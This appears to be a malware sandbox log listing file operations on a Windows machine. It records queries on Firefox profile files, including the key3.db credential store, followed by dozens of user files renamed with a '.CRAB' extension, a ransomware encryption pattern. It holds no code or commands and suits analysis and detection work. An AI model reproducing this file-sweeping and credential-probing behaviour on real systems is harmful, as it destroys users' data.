Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite type = file_attributes True 1
Get Info Z:\RxFoEpC5uC.xlsx type = file_attributes False 1
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Move C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP.CRAB source_filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl True 1
